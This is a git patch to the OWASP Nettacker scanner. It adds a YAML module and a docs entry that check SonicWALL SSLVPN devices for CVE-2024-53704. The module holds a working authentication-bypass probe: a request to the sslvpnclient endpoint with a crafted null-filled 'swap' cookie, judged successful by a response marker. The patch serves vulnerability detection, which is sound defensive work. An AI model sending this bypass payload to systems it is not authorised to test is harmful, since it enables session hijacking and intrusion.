From 626a76570890a9c090a3897149ab1b1d68b0f358 Mon Sep 17 00:00:00 2001 From: Sam Stepanyan Date: Thu, 20 Feb 2025 02:30:11 +0000 Subject: [PATCH] adding SonicWALL SSLVPN CVE-2024-53704 module (#1018) * Update paloalto_panos_cve_2025_0108.yaml added cisa_kev Adding cisa_kev profile to the module: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has just added this CVE-2025-0108 impacting Palo Alto Networks PAN-OS to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. * adding sonicwall_sslvpn_cve_2024_53704_vuln module --- docs/Modules.md | 1 + .../vuln/sonicwall_sslvpn_cve_2024_53704.yaml | 58 +++++++++++++++++++ 2 files changed, 59 insertions(+) create mode 100644 nettacker/modules/vuln/sonicwall_sslvpn_cve_2024_53704.yaml diff --git a/docs/Modules.md b/docs/Modules.md index a364cc97..e65ee37d 100644 --- a/docs/Modules.md +++ b/docs/Modules.md @@ -153,6 +153,7 @@ If you want to scan all ports please define -g 1-65535 range. Otherwise Nettacke * '**ProFTPd_memory_leak_vuln**' - check ProFTPd for CVE-2001-0136 * '**ProFTPd_restriction_bypass_vuln**' - check ProFTPd for CVE-2009-3639 * '**server_version_vuln**' - check if the web server is leaking server banner in 'Server' response header +* '**sonicwall_sslvpn_cve_2024_53704_vuln**' - check the target for SonicWALL SSLVPN CVE-2024-53704 vulnerability * '**ssl_signed_certificate_vuln**' - check for self-signed & other signing issues(weak signing algorithm) in SSL certificate * '**ssl_expired_certificate_vuln**' - check if SSL certificate has expired or is close to expiring * '**ssl_version_vuln**' - check if the server's SSL configuration supports old and insecure SSL versions diff --git a/nettacker/modules/vuln/sonicwall_sslvpn_cve_2024_53704.yaml b/nettacker/modules/vuln/sonicwall_sslvpn_cve_2024_53704.yaml new file mode 100644 index 00000000..dbc057dc --- /dev/null +++ b/nettacker/modules/vuln/sonicwall_sslvpn_cve_2024_53704.yaml @@ -0,0 +1,58 @@ +info: + name: sonicwall_sslvpn_cve_2024_53704_vuln + author: OWASP Nettacker team + severity: 8.2 + description: CVE-2024-53704 Is an Improper Authentication vulnerability in the SonicWALL SSLVPN authentication mechanism which allows a remote attacker to bypass authentication. + reference: + - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0003 + - https://bishopfox.com/blog/sonicwall-cve-2024-53704-ssl-vpn-session-hijacking + - https://www.cisa.gov/news-events/alerts/2025/02/18/cisa-adds-two-known-exploited-vulnerabilities-catalog + profiles: + - vuln + - vulnerability + - http + - high_severity + - cve + - sonicwall + - cisa_kev + + +payloads: + - library: http + steps: + - method: get + timeout: 3 + headers: + Host: "{target}" + User-Agent: "{user_agent}" + Cookie: 'swap=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=' + allow_redirects: false + ssl: false + url: + nettacker_fuzzer: + input_format: "{{schema}}://{target}:{{ports}}/{{paths}}" + prefix: "" + suffix: "" + interceptors: + data: + paths: + - "cgi-bin/sslvpnclient?launchplatform=" + schema: + - "https" + ports: + - 443 + - 4433 + - 4443 + response: + condition_type: and + conditions: + status_code: + regex: "200" + reverse: false + header: + Server: + regex: 'SonicWALL SSLVPN Web Server' + reverse: false + content: + regex: 'NELaunchX1' + reverse: false \ No newline at end of file